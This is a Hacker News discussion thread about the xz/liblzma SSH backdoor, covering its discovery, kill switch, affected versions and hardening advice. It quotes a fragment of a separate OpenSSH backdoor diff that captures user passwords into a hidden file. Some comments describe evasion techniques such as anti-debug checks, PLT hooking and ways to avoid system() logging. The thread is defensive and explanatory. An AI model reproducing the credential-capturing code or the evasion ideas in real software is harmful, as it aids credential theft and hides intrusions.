Did the artefact produced [0] for fuzzing even include the backdoored .so? My understanding was that the compromised build scripts had measures to only run when producing debs/rpms.
https://github.com/google/oss-fuzz/blob/5f70676a6c9050b9cb68...
Is the person Jia who did this PR a malicious actor?
The person who submitted the PR, JiaT75, is.
The person who approved and merged it is not.
Yeah that’s what I am asking. Thanks
Has that person been found yet?
Does this problem require cops, or an airstrike?
I think they added it in parts over the course of a year or two, with each part being plausibly innocent-looking: First some testing infrastructure, some test cases with binary test data to test compression, updates to the build scripts – and then some updates to those existing binary files to put the obfuscated payload in place, modifications to the build scripts to activate it, etc.
Has anyone proposed a name for this exploit yet?
CVE-2024-3094
"Backdoor in upstream xz/liblzma leading to ssh server compromise"[0] isn't bad either.
doordassh :)
ooh I like this one. I'd propose: backdoordassh
But I wonder if they'd run into trademark issues
LZMAO
This should be it.
It's by far the best, because someone is definitely "LMAO".
xzploit
rxzec
Dragon Gate. There’s my contribution.
All Your SSH Are Belong To Us
Jia-had
Pick one: xzdoor, backdoorssh
OpenSSH certs are weird in that they include the signer's public key.
OpenSSH signatures in general contain the signer's public key, which I personally think is not weird but rather cool, since it allows verifying the signature without out-of-band key delivery (as in OpenPGP). The authentication of the public key is a separate subject, but at least some basic checks can be done with an OpenSSH signature alone.
cool since it allows verifying the signature without out-of-band key delivery
hope you do key selection sanitization instead of the default (nobody does). otherwise you're offering random keys you have lying around (like your github one) when logging in to secret.example.com
Using an SSH key used with GitHub for other purposes than GitHub is not a good practice (even if it's common).
I’m confused. I make a unique private key for each machine I use. How is using that machine-specific key on multiple hosts insecure?
Your SSH public keys used on GitHub are very publicly exposed.
This information could be used by SSH servers you are connecting to. You might think you are connecting anonymously, while in fact your SSH client is sending your public key which could then be resolved to your GitHub account.
I don't get it. How do you end up with shell access on a machine you don't trust to know your identity?
edit your .ssh/config.
add one Host entry per domain.
at the end of the file add one catch-all host rule with IdentityFile /dev/null
otherwise you're sending default key names to all hosts.
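A minimal ~/.ssh/config sketch of the above (host names and key file names are placeholders; IdentitiesOnly is an extra belt-and-braces option, not something the steps above require):

    # ~/.ssh/config
    Host github.com
        IdentityFile ~/.ssh/id_ed25519_github
        IdentitiesOnly yes        # only ever offer this key to this host

    Host secret.example.com
        IdentityFile ~/.ssh/id_ed25519_secret
        IdentitiesOnly yes

    # catch-all: don't offer any of the default keys to unknown hosts
    Host *
        IdentityFile /dev/null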
...and you are not sending id_rsa.pub to every single place you add a key, like most guides suggest, right? right?
I would be interested in a comprehensive guide on "doing it right", or a link to a guide that suggests the right thing.
What do you mean ?
Lucky the XZ license switched from "Public Domain" to 0BSD in February (just before these 5.6.0 and 5.6.1 releases)!
0BSD has no clauses, but it does have this:
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
Gross negligence and willful misconduct cannot be waived away like this, in certain jurisdictions at least.
Yes, but hopefully it does protect Lasse Collin.
From what?
Litigation including criminal prosecution
He had nothing to do with this, no one is going to prosecute him.
Uh, what would be his charge? I cannot fathom how, and based on what, he would be charged. Maybe this is an American thing, but he's not a US citizen to start with.
But didn't the public-domain license already prevent that, at least in most countries? Local law takes precedence over licenses anyway.
The questions this backdoor raises:
- what other ones exist by this same team or similar teams?
- how many such teams are operating?
- how many such dependencies are vulnerable to such infiltration attacks? what is our industry’s attack surface for such covert operations?
I think making a graph of all major network services (apache httpd, postgres, mysql, nginx, openssh, dropbear ssh, haproxy, varnish, caddy, squid, postfix, etc) and all of their dependencies and all of the committers to all of those dependencies might be the first step in seeing which parts are the most high value and have attracted the least scrutiny.
This can’t be the first time someone attempted this - this is just the first unsuccessful time. (Yes, I know about the attempted/discovered backdoor in the linux kernel - this is remote and is a horse of a different color).
Why did they decide to create a backdoor, instead of using a zeroday like everyone else?
Why did they implement a fully-featured backdoor and attempt to hide the way it is deployed, instead of deploying something innocent-looking that might as well be a bug if detected?
These must have been conscious decisions. The reasons might provide a hint what the goals might have been.
Wild guess, but it could be that whoever was behind this was highly motivated but didn't have the skill required to find zerodays and didn't have the connections required to buy them (and distrusted the come one come all marketplaces I assume must exist).
Ed448 is orders of magnitude better NOBUS (nobody but us) than hoping that nobody else stumbles over the zero-day you found.
Presumably because other people could also exploit a "bug" they created intentionally but made to look inadvertent. This backdoor, however, is activated only by the private key that the attacker holds, so it's airtight.
If they seemingly almost succeeded, how many others have already planted similar backdoors? Or was this actually just poking at things to see if it was possible to inject this sort of behaviour?
Also: Why did Debian patch a service that runs as root and accepts connections from the internet to load unnecessary libraries?
There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01...
Which functions as a killswitch:
https://piaille.fr/@zeno/112185928685603910
If that is indeed the case, one mitigation might be
```
echo "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" | sudo tee -a /etc/environment
```
That's so strange. This reeks of nation state actors, wanting ways to protect their own systems.
This is a good example of bad logic. It doesn't reek of anything except high quality work. You have an unacknowledged assumption that only nation state actors are capable of high quality work. I think that ultimately you want it to be nation state actors and therefore you see something that a nation state actor would do, so you backtrack that it is a nation state actor. So logically your confirmation bias leads you to affirm the consequent.
I only say this because I'm tired of seeing the brazen assertions of how this has to be nation state hackers. It is alluring to have identified a secret underlying common knowledge. That's why flat-earthers believe they've uncovered their secret, or chemtrail believers have identified that secret, or anti-vaxxers have uncovered the secret which underlies vaccines. But the proof just isn't there. Don't fall into the trap they fell into.
any competent malware dev would have a panic switch...
if you need to test your own malware that you're developing, do you really want to just run it and disrupt your own system?
It's not uncommon to put in a check that allows the malware to run but be a noop.
Make absolutely sure to include `-a` so it doesn't nuke your env file, and generally speaking, one should upgrade to a version without the malicious code and restart, of course.
without the malicious code and restart
i wonder if the malicious code would've installed a more permanent backdoor elsewhere that would remain after a restart.
I recall things like on windows where malware would replace your keyboard drivers or mouse drivers with their own ones that had the malware/virus, so that even if the original malware is removed, the system is never safe again. You'd have to wipe. And this is not even counting any firmware that might've been dropped.
God the amount of damage this would've caused, nightmarish, we are so unbelievably lucky. In a few months it would've been in every deb&rpm distribution. Thank God we found it early!
Found it early?..
I found the backdoor on five of my Vultr servers as well as my MacBook Pro this evening. I certainly didn’t catch it early.
So if that’s the state of it, it could very well be too late for many many companies. Not to mention folks who rely on TOR for their safety - there could be entire chains of backdoored entry, middle and exit nodes exposing vast numbers of TOR users over the past month or so (spies included!).
...maybe list the distros or macOS point releases/paths where you found it. ;P
Homebrew had updated to the backdoored version, so although it doesn't appear to trigger on macOS, you should update things to 'upgrade' from 5.6.1 to 5.4.6.
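Something along these lines should do it, assuming Homebrew has already shipped the reverted formula:
```
brew update && brew upgrade xz
xz --version   # should now report 5.4.6, not 5.6.x
```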
It was only in rolling release/testing/unstable distributions, a pretty small subset of systems in the grand scheme of things, which is why I said that. It was introduced in the February 23 release of xz. It could have been years until it was discovered.
Never use unstable/testing on real servers, that's a bad idea for entirely different reasons.
Which Distro did you use on the affected devices?
Very few companies, close to zero, are using rolling distros in their critical infra.
What I’d like to understand is: how has it been proven intentional?
My understanding is it was a few added characters in a header file. I can’t tell you the number of times I was tired and clicked an extra key before committing, or my cat walked across the keyboard while I was out of the room.
That level of sophistication is certainly intentional.
That’s not an explanation of exactly how intent was established.
I suppose I’m asking for the chain of events that led to the conclusion. I see lots of technical hot takes for how something could work, with no validation it does, nor intent behind it.
I’d like to understand what steps we know were taken and how that presents itself.
I think you're probably missing a lot context about the situation. Here's some useful links https://x0f.org/@FreePietje/112187047353892463 also https://gynvael.coldwind.pl/?lang=en&id=782
Appreciate, that’s the context I was looking for
You should read up on the attack. The few characters were part of avoiding a specific case of detection. The backdoor is very large, is only added during the tarball build, and happens to only work when a special key is presented.
It was a few added characters in a header file to make it possible to deliver the actual payload: 80+ kilobytes of machine code. There's no way to actually tell, but I'd estimate the malware source code to be O(10000) lines in C.
It's actually pretty sophisticated. You don't accidentally write an in-memory ELF program header parser.
If my server doesn't have any RSA public keys in its authorized_keys, only ed25519 keys; does this backdoor just not work?
It will still work if the connecting client offers an RSA key.
The only real way to be sure it's not on your system is if your liblzma version is strictly less than 5.6.0 (first infected version):
ls -al $(ldd $(which sshd) | grep lzma | awk '{ print $3 }')
Thanks for the reply, I was just curious because `RSA_public_decrypt` threw me off.
FWIW, RSA_public_decrypt is a '90s way of saying RSA_signature_validate.
This backdoor does not care about any of the authorisation configuration set by the user.
It is executed before that step. So just make sure you are not affected.
It was just that it hooks to `RSA_public_decrypt` which threw me off, I didn't really understand this backdoor much. I only have one Debian sid machine which was vulnerable and accessible via a public IPv4 ssh, I'm not sure if I should just wipe it.
Could the backdoor have targeted Wireguard instead of ssh?
SSH is a shell, whereas WireGuard is a VPN.
You will still be vulnerable as you can connect to an ssh server through your wireguard tunnel.
I don't think that's what OP is asking. I think OP is asking if wireguard functions could be hooked in the same way as sshd functions are in this exploit.
Well, yes, I can, but unlike ssh which is open to the world, my VPN is only open to me and the family. It seems like that greatly reduces the potential attack surface.
My first instinct would be no, as WireGuard runs in kernel space (if you're using kernel WireGuard, not wireguard-go or some other userspace implementation), and couldn't link in liblzma, a userspace component.
Down voted for asking a valid question? Or is every reader of every HN post expected to be an in depth expert in every article posted every minute of every day of the year? What kind of asshole who has earned the right to down vote comments on HN would down vote a legitimate question?
If the RCE is Russian, it could be used as a communication kill-switch on the morning of an attack outside Ukraine, similar to the Viasat hack https://en.m.wikipedia.org/wiki/Viasat_hack
Why does it have to be russian? Could be any country, even USA, China. I don't see why this sort of attack is limited to Russia.
Exactly I don't understand the obsession with Russia
Literally just a country with people like you and me.
"Jia Tan" does not sound Russian
https://boehs.org/node/everything-i-know-about-the-xz-backdo...
"Jia Tan" does not sound Russian
It's not a real name.
What about X Æ A-12?
Why does it have to be russian? Could be any country, even USA, China.
Are you sure you are replying to the right comment? They did not imply it was not some other country or actor. It even directly starts with 'if'.
Currently if you visit the xz repository it is disabled for violating github's TOS.
While it should clearly be disabled, I feel like GitHub should leave the code and history up, while displaying a banner (and disabling any features that could be exploited), so that researchers and others can learn about the exploit.
In more minor situations when a library is hosting malicious code, if I found the repo to be down I might not think anything of it.
xz has its own git mirror where you can see all the commits
Notably only writable by Lasse who I personally believe is a Good Actor here.
I imagine they don’t want automation downloading it.
You can find GitHub events from the repo as a csv here https://github.com/emirkmo/xz-backdoor-github
If you are interested in the source code that is easy to find. This code and git repo are linked all over the world, in many git repos, and the source is bundled many times in releases as well.
I’d like to know what we mortals – those that run Ubuntu LTS on VMs, for instance — need to do, if anything.
Same!
Right now, nothing. The issue didn’t reach mainstream builds except nightly Red Hat and Fedora 41. The xz version affected has already been pulled and won’t be included in any future software versions.
I would, by routine, advise that publicly available boxes are configured to accept connections only from whitelisted sources, doing that at the lowest possible level on the stack. That’s usually how secure environments such as those used in PCI compliant topologies are specified.
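A minimal sketch of that with iptables (the address range is a placeholder; nftables or cloud security groups express the same idea):
```
# Accept SSH only from a trusted management range; drop everything else.
iptables -A INPUT -p tcp --dport 22 -s 203.0.113.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP
```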
My suggestion: Put your SSH behind WireGuard and/or behind a jump host (with only port forwarding allowed, no shell). If you don’t have a separate host, use a Docker container.
If you use a jump host, consider a different OS (e.g., BSD vs Linux). Remember the analogy with slices of Swiss cheese used during the pandemic? If one slice has a hole, the next slice hopefully won't have a hole in the same position. The more slices you have, the better for you.
Although for remote management, you don’t want to have too many “slices” you have to manage and that can fail.
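A rough sketch of the "port forwarding only, no shell" part (the option names are standard OpenSSH configuration; user and host names are placeholders):
```
# sshd_config on the jump host: forwarding allowed, no TTY or useful command.
Match User jumpuser
    AllowTcpForwarding yes
    PermitTTY no
    X11Forwarding no
    ForceCommand /usr/sbin/nologin

# ~/.ssh/config on the client: hop through the jump host transparently.
Host internal-box
    ProxyJump jumpuser@jump.example.com
```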
I am wondering if reinstalling the entire Archlinux installation would be a wise choice.
Arch Linux uses a native/unpatched version of OpenSSH without a dependency on libsystemd, and thus without a dependency on xz-utils, resulting in no exploitable code path. This means that at least the currently discussed vulnerability/exploit via SSH presumably did not work on Arch. Disclaimer: this is my understanding of the currently circulating facts. Additional fallout might be possible, as the reverse engineering of the backdoor is ongoing.
there are other ways for liblzma to get into ssh (via PAM and libselinux)
This is only correct if the sshd backdoor is the only malicious code introduced into the library.
Just to extend the sibling comment with an excerpt of the Arch announce mail regarding the backdoor:
From the upstream report [1]:
> openssh does not directly use liblzma. However debian and several other
> distributions patch openssh to support systemd notification, and libsystemd
> does depend on lzma.
Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:
```
ldd "$(command -v sshd)"
```
However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other yet-to-be discovered methods to exploit the backdoor could exist.
I'm surprised the attackers used Ed448 instead of Ed25519.
Maybe their organisation has a policy that requires stronger encryption? Possibly because that organisation is also in the business of cracking such encryption...
Is Ed448 stronger than Ed25519?
Quantitatively, yes (a 2^224 security target vs a 2^128 security target, respectively, with respect to discrete-log computation).
Qualitatively, 2^128 is already computationally infeasible (barring some advance in quantum computing), so the meaningful difference in security is debatable, assuming no weaknesses in the underlying curve.
Maybe they know something we don’t about Ed25519? [Cue X-Files theme tune]
The headline seems like a distinction without a difference. Bypassing ssh auth means getting a root shell. There is no significant difference between that and running system(). At most maybe system() has less logging.
Bypassing ssh auth means getting a root shell
Only if you're allowed to login as root, which is definitely not the case everywhere.
Plus, detection is likely to be very different.
My sense was this backdoor gets to execute whatever it wants using whatever "user" sshd is running as. So even if root logins are disabled, this backdoor doesn't care.
not only that, but logins show up in logs.
One of the takeaways from this to me is that there is way too much sketchy bullshit happening in critical system software. Prebuilt binary blobs [1]? Rewriting calls to SIMD enhanced versions at runtime [2]? Disabling sanitizers [3]? Incomprehensible build scripts [4]?
All of this was either at least strongly frowned upon, if not outright unacceptable, on every project I've ever worked on, either professionally or for fun. And the stakes were far lower for those projects than critical linux system software.
1. https://lwn.net/Articles/967442/
Prebuilt binary blobs [1]?
My understanding is that the binary blobs were test data. Find a bug that happens on certain input. Craft a payload that both triggers the bug and does the malicious thing you want to do. Add the binary blob to /tests/files/. Then write a legitimate test to ensure that the bug goes away.
Then do some build script bullshit to somehow get that binary into the build.
Rewriting calls to SIMD enhanced versions at runtime?
That's something that's been done for decades. It's pretty normal. What's not normal is for that to get re-done after startup. That is, one library should not be able to get that resolution process to be re-done after it's been done once. Malicious code that knows the run-time linker-loader's data structures could still re-resolve things anyways, which means that even removing this feature altogether from the run-time linker-loader wouldn't prevent this particular aspect of this attack.
I.e., you're barking up the wrong tree with (2).
We should probably look into other fundamental dependencies like xz as well to see if similar practices are happening.
Another good reason to use a firewall with an IP address allowlist for SSH.
And now for my next trick: smuggling a backdoor into iptables.
Ha yes. I rely on cloud-provided security groups for that. So I blindly have to believe my provider is immune to supply chain attacks.
I've seen a lot of discussion on the topic but have yet to see someone just specify which versions of xz are likely affected so that I can verify whether I'm running them or not ..
Ask your distro. On Arch, it's 5.6.0-1 and 5.6.1-1. Most of Debian (outside sid/unstable) is unaffected, as allegedly is Red Hat.
https://archlinux.org/news/the-xz-package-has-been-backdoore...
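If you just want to check what's installed locally, something like this works (package names vary by distro):
```
xz --version          # affected upstream releases: 5.6.0 and 5.6.1
# Debian/Ubuntu:
dpkg -l liblzma5 xz-utils
# Arch:
pacman -Q xz
# Fedora/RHEL:
rpm -q xz xz-libs
```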
Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.
Does this mean it's possible to send every ssh server on the internet a malformed payload to get it to disable the backdoor if it was vulnerable?
It just reverts for the specific connection - most likely so as not to raise suspicion by making sshd stop accepting RSA keys altogether.
I'm assuming nation states and similar actors monitor mailing lists for phrases like "I'm feeling burnt out" or "not enough bandwidth, can you open a PR?"
According to the timeline here, trust was established in "only" a few years. https://boehs.org/node/everything-i-know-about-the-xz-backdo...
So I imagine major actors already have other assets in at-risk open source projects, either for the source code or distro patch/packaging level. Is that too tinfoil hat? I only know enough about secops to be dangerous to myself and everyone around me.
Is that too tinfoil hat?
Not at all, no. This is probably happening way more than just this instance, unfortunately.
If I'm reading this right, would there be any persistent evidence of the executed payload? I can't think of a reason anything would have to go to disk in this situation, so a compromise could easily look like an Auth failure in the logs .... maybe a difference in timings .. but that's about it ...
Unless the payload did something that produced evidence, or if the program using openssl that was affected was, for some reason, having all of its actions logged, then no, probably not.
git.tukaani.org runs sshd. If that sshd was upgraded with the xz backdoor, we cannot exclude that the host was compromised, as it could have been an obvious target for the backdoor author.
Rather unlikely. The bad actor never had access to git.tukaani.org, and the sshd version running on that host is:
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u3
That is, a stable Debian release. Definitely not one with liblzma5 5.6.x.
So this is why Apple hates open source. Random anons committing to your project.
I think their problem with open source is more that they can't have complete control and make every user's decision for them; security is just a nice tag-along to that.
So is this backdoor active in Ubuntu distributions?
It appears not.
It just seems implausible that the malicious x86 code would not have shown up in strace, perf record, or some backtrace. Once this ended up in all the major distros, some syscall or glibc call would have eventually looked like a red flag to someone before long.
SE Linux comment by @poettering, https://news.ycombinator.com/item?id=39867126
> Libselinux pulls in liblzma too and gets linked into tons more programs than libsystemd. And will end up in sshd too (at the very least via libpam/pam_selinux). And most of the really big distros tend do support selinux at least to some level. Hence systemd or not, sshd remains vulnerable by this specific attack.
Devuan comment by @capitainenemo, https://news.ycombinator.com/item?id=39866190
> The sshd in Devuan does link to a libsystemd stub - this is to cut down on their maintenance of upstream packages. However that stub does not link to lzma.
Future proofing, https://gynvael.coldwind.pl/?lang=en&id=782
Stage 2 "extension" mechanism
This whole thing basically looks like an "extension/patching" system that would allow adding future scripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which makes sense, as modifying the "bad" and "good" test files over and over again is pretty suspicious. So the plan seemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.
Who was the author ?
Maybe we should consider moving more and more system processes to WebAssembly. wasmtime has a nice sandbox. Surely it will decrease performance, but performance is not always that important. For example, on my dev machine, even if sshd's or Apache's performance dropped 3x because of that, I wouldn't mind. If I really cared, I'd spend more money on a more powerful CPU.
Lessons learned from an SSH backdoor:
https://pcao.substack.com/p/a-tale-of-an-ssh-backdoor-and-re...
The recent backdoor in XZ leading to Secure Shell (SSH) server compromise is still evolving [1,2,3]. For open-networked environments such as HPC or supercomputers, login nodes are particularly vulnerable. This XZ backdoor recalls lessons learned from previous security incidents [4] and motivates the important community discussions below.
The SSH backdoor security incident
In April 2018, NCSA's security team was notified of suspicious activity on a multiuser host supporting a major science project.
The source code of the backdoor in one instance of OpenSSH’s sshconnect2.c is listed below.
openssh/sshconnect2.c (diff output)
 int userauth_passwd(Authctxt *authctxt)
 {
+    mode_t u;
+    char *file_path = "/usr/lib64/.lib/lib64.so";
     [...]
+    strcat(out, password);
+    }
 }
[1] backdoor in upstream xz/liblzma leading to ssh server compromise, https://www.openwall.com/lists/oss-security/2024/03/29/4
[2] Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094, https://www.cisa.gov/news-events/alerts/2024/03/29/reported-...
[3] Urgent security alert for Fedora Linux 40 and Fedora Rawhide users, https://thehackernews.com/2024/03/urgent-secret-backdoor-fou...
[4] CAUDIT: Continuous Auditing of SSH Servers To Mitigate Brute-Force Attacks
Phuong Cao, Y Wu, SS Banerjee, J Azoff, A Withers, ZT Kalbarczyk, RK Iyer
16th USENIX Symposium on Networked Systems Design and Implementation (NSDI)
We basically need to analyse dependencies used in critical code paths (e.g. network attached services like sshd) and then start a process to add more rigorous controls around them. Some kind of enhanced scrutiny, certification and governance instead of relying on repos with individual maintainers and no meaningful code reviews, branch protection, etc.
And by "we" I mean at the international/governmental level. Free software needs to stop being $free.
Society needs to start paying for the critical foundations upon which we all stand.
Whilst we are in 3bp mode: what happens if a state actor wants to harm open source … not to destroy it but to pollute it … as said, you cannot check and test it all. Legal consequences … they do not care.
I wonder.
… The "we are all good" vs "even Buddha has an evil nature" mental model.
It's weird now that "it's right there in the open",
Listed among the most recent commits there is "update two test files" https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6e636819e8f...
And it's kind of smart to attack a compression library - you have plausible deniability for these opaque binary blobs - they are supposedly test cases, but in reality encode parts of the backdoor.
Doesn’t certificate verification occur in the privsep process? If so, this would only grant RCE with the unprivileged (nobody) user's privileges.
So this is called the house of cards backdoor now?
This was so bizarre I had to check twice that it isn't actually April 1 (I'm in Asia so I get a lot of off-by-one-day stories from the US)
Why does xz need new features at this point?
Until the entire scope of this is identified, I suggest activating the kill switch
https://bcksp.blogspot.com/2024/03/how-to-disable-xz-backdoo...
I expect a lot of people will be doing a whole lot of thinking along these lines over the next months.
Code review? Some kind of behavioral analysis?
IMO the call to system() was kind of sloppy, and a binary capabilities scanner could have potentially identified a path to that.
I think behavioral analysis could be promising. There's a lot of weird stuff this code does on startup that any reasonable Debian package on the average install should not be doing in a million years.
Games and proprietary software will sometimes ship with DRM protection layers that do insane things in the name of obfuscation, making it hard to distinguish from malware.
But (with only a couple of exceptions) there's no reason for a binary or library in a Debian package to ever try to write to the PLT outside of the normal mechanism, to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures, to do anti-debug tricks, or just to have any kind of obfuscation or packing that free software packaged for a distro is not supposed to have.
Some of these may be (much) more difficult to detect than others, some might not be realistic. But there are several plausible different ways a scanner could have detected something weird going on in memory during ssh startup.
No one wants a Linux antivirus. But I think everyone would benefit from throwing all the behavioral analysis we can come up with at new Debian package uploads. We're very lucky someone noticed this one, we may not have the same luck next time.
ClamAV has been around for a very long time at this point.
It's just not installed on servers, usually
don't most people who use that just use it for scanning incoming email attachments usually?
ClamAV also produces a lot of findings when scanning some open source projects' source code, for example the LLVM project's test data. Because some of that test data is meant to check that a known security bug is fixed, from an antivirus perspective those data files can look like exploits. ClamAV is commonly used, and I would suggest adding it to every CI build pipeline. Most of the time it wouldn't find anything, but it is better than nothing. I would like to offer free help if an open source project needs to harden its build pipeline and release process.
Does not have to be installed. See this: https://learn.microsoft.com/en-us/azure/defender-for-cloud/c...
A cloud provider can take snapshots of running VMs then run antivirus scan offline to minimize the impact to the customers.
Similarly, many applications are containerized and the containers are stateless, we can scan the docker images instead. This approach has been quite mature.
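As a sketch, scanning an exported image is only a couple of commands (the image name is a placeholder, and to be clear, ClamAV's signatures would not have caught this particular backdoor):
```
docker save -o myapp.tar myapp:latest
clamscan --scan-archive=yes myapp.tar
```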
In general, my gut feeling is that I expect the majority ClamAV installations to be configured to scan for Windows viruses in user submitted content. Email, hosting sites, etc.
To say nothing of enterprise EDR/XDR solutions that have linux versions. These things aren’t bulletproof but can be 1 layer in your multilayer security posture.
Except had we been doing that they would have put guards in place to detect it - as they already had guards to avoid the code path when a debugger is attached, to avoid building the payload in when it's not one of the target systems, and so on. Their evasion was fairly extensive, so we'd need many novel dynamic systems to stand a chance, and we'd have to guard those systems extremely tightly - the author got patches into oss-fuzz as well to "squash false positives". All in all, adding more arms to the arms race does raise the bar, but the bar they surpassed already demonstrated tenacity, long term thinking, and significant defense and detection evasion efforts.
I broadly agree, but I think we can draw a parallel with the arms race of new exploit techniques versus exploit protection.
People still manage to write exploits today, but now you must find an ASLR leak, you must chain enough primitives to work around multiple layers of protection, it's generally a huge pain to write exploits compared to the 90s.
Today the dynamic detection that we have for Linux packages seems thin to non-existent, like the arms race has not even started yet. I think there is a bit of low-hanging fruit to make attacker lives harder (and some much higher-hanging fruit that would be a real headache).
Luckily there is an asymmetry in favor of the defenders (for once). If we create a scanner, we do not _have_ to publish every type of scan it knows how to do. Much like companies fighting spammers and fraud don't detail exactly how they catch bad actors. (Or, for another example, I know the Tor project has a similar asymmetry to detect bad relays. They collaborate on their relay scanner internally, but no one externally knows all the details.)
This is an arms race that is largely won by attackers, actually. Sophisticated attacks are caught by them sometimes but usually the author has far more knowledge or cleverer tricks than the person implementing the checks, who is limited by their imagination of what they think an attacker might do.
Yeah, perhaps something akin to an OSS variant of virustotal's multi-vendor analysis. I'm still not sure it would catch this, but as you say, raising the bar isn't something we tend to regret.
If the prior is that one was out there (this one), the chance that one or more are still undetected seems fairly high to me.
To behaviourally detect this requires many independent actors to be looking in independent ways (e.g. security researchers, internal teams). Edit: I mean with private code & tests (not open source, nor purchasable antivirus). It's not easy to donate to Google Project Zero. Some of the best funded and most skilled teams seem to be antivirus vendors (and high-value-person protection). I hate the antivirus industry, yet I've been helped by it (the anti-tragedy of the commons).
Commonly public detection code (e.g. open source) is likely to be defeated by attackers with a lot of resources.
Hard to protect ourselves against countries where the individuals are safe from prosecution. Even nefarious means like assassination likely only work against individuals and not teams.
That would surprise me greatly
I think you’re saying “I would be surprised if there is only 1 exploit like this that already exists” which is what the previous comment was also saying. “If the prior is one” is often used to mean “we know for sure that there is one”.
Sorry, I'm unfamiliar with PLT. What does it stand for?
procedure linkage table
I want to name one thing: when Windows fails to load a DLL because a dependency is missing, it doesn't tell you which one was missing. To get that information, you have to interact with the DLL loader through low-level Windows APIs. In some circumstances Linux apps may also have that need, e.g. for printing a user-friendly error message or recovering from a non-fatal error. For example, the patchelf tool that is used for building portable Python packages.
That is not true. This kind of software is actually very popular in enterprise settings.
Why "new uploads" and not also "all existing"?
Dynamic linking was a mistake and should be eliminated
That this was dynamically linked is the least interesting thing about it IMO. It was a long-term infiltration where they got legitimate commit access to a well-used library.
If xz were statically linked in some way, or just used as an executable to compress something (like the kernel), the same problems would exist and no dynamic linking would need to be involved.
Not true: it would be much harder to hook into OpenSSL functions if the final executable were static [1]; the only way would be if the OpenSSL function this attack targeted actually called a function from liblzma.
[1] https://sourceware.org/glibc/wiki/GNU_IFUNC
Dynamic loading is a relic of the past and the cause of many headaches in the Linux ecosystem; in this case it also obfuscates the execution path of the code, so you can't really rely on the code you are reading. Unfortunately I don't think it's possible to completely get rid of dynamic loading, as some components such as GPU drivers require it, but it should be reduced to a minimum.
Looking at IFUNC, there never seems to be a reason to allow function loading from a different library than the one the call is in, right? Maybe a restriction like that could be built in. Or just explicitly enumerate the possible substitutions per site.
Sure, but your solution supposes some kind of linking cop program overseeing the linking process, and who is going to keep the linking cop honest?
I mean, the dynamic loader is part of the base system, and you generally trust the compiler and linker you build the program with. If any of those are malicious, you've already lost the game.
Asking a programmer to trust his own compiler and libraries which he can personally analyze and vouch for (static linking) is much different than asking the programmer to vouch for the dynamic libraries present on some given user’s machine.
This particular approach of hooking would be much harder; but a malicious xz has other options as well. It's already in the code path used by dpkg when unpacking packages for security updates, so it could just modify the sshd binary, or maybe add a rootkit to the next kernel security update.
It seems foolish to change our systems to stop one of the steps the attacker used after their code was already running as root; the attacker can just pick something else; as root they have essentially unlimited options.
“It seems foolish to change”
Rejecting evidence in favor of retaining preconceptions is certainly popular.
True, but such code changes in xz would be much easier to audit than all the dynamic loading shenanigans, even if obfuscated in the build system. GNU's dynamic loader especially has grown to be very complicated (having all these OOP-like polymorphism features at the linker/loader level ...), and I think we should tone down the usage of dynamic linking, as I see it as low-hanging fruit for attacks in general.
Even more so: all binaries dynamically linking xz can be updated by installing a fixed library version. For statically linked binaries, not so much: each individual binary would have to be relinked. Good luck with that.
In exchange, each binary can be audited as a final product on its own merits, rather than leaving the final symbols-in-memory open to all kinds of dubious manipulation.
That is essentially what all distros with sane build systems do.
yep, but how to reverse such a blunder?
Well step one is to just stop doing it? I guess someone will need to start publishing a static-only linux distro
The real problem was doing expensive math for every connection. If it had relied on a cookie or some simpler-to-compute pre-filter, no one would have been the wiser.
The slowdown is actually in the startup of the backdoor, not when it's actually performing authentication. Note how in the original report even sshd -h (called in the right environment to circumvent countermeasures) is slow.
Wow. Given the otherwise extreme sophistication this is such a blunder. I imagine the adversary is tearing their hair out over this. 2-3 years of full time infiltration work down the drain, for probably more than a single person.
As for the rest of us, we got lucky. In fact, it’s quite hilarious that some grump who’s thanklessly perf testing other people’s code is like “no like, exploit makes my system slower”.
You're responding to said grump ;)
Andres is one of the most prolific PostgreSQL committers and his depth of understanding of systems performance is second to none. I wouldn't have guessed he would one day save the world with it, but there you go.
If it was not fulltime work I wonder what else they have been working on with different accounts.
If you think about it, this is a data-provenance problem though. The exploit was hidden in "test" code which gets included in release code by compiler flags.
Now, if there was a proper chain of accountability for data, then this wouldn't have been possible to hide the way it is - any amount of pre-processing resulting in the release tarball including derived products of "test" files would be suspicious.
The problem is we don't actually track data provenance like this - no build system does. The most we do is <git hash in> -> <some deterministic bits out>. But we don't include the human-readable data which explains how that transform happens at enough levels.
You don’t need to go to that extent even - simply properly segregating test resources from dist resources would have prevented this, and that’s something Java has been doing for 20 years.
It’s not sufficient against a determined attacker, but it does demonstrate just how unserious the C world is about their build engineering.
I literally can’t think of a single time in 15 years of work that I’ve ever seen a reason for a dist build to need test resources. That’s at best a bug - if it’s a dist resource it goes in the dist resources, not test. And if the tooling doesn’t do a good job of making that mistake difficult… it’s bad tooling.
The call to system() is obfuscated; static analysis wouldn't see it.
I'm really surprised they did a call to system() rather than just implement a tiny bytecode interpreter.
A bytecode interpreter that can call syscalls can be just a few hundred bytes of code, and means you can avoid calling system() (whose calls might be logged), and avoid calling mprotect to make code executable (also something likely to raise security red flags).
The only downside of a bytecode interpreter is that the whole of the rest of your malware needs to be compiled to your custom bytecode to get the benefits, and you will take a pretty big performance hit. Unless you're streaming the user's webcam, that probably isn't an issue though.
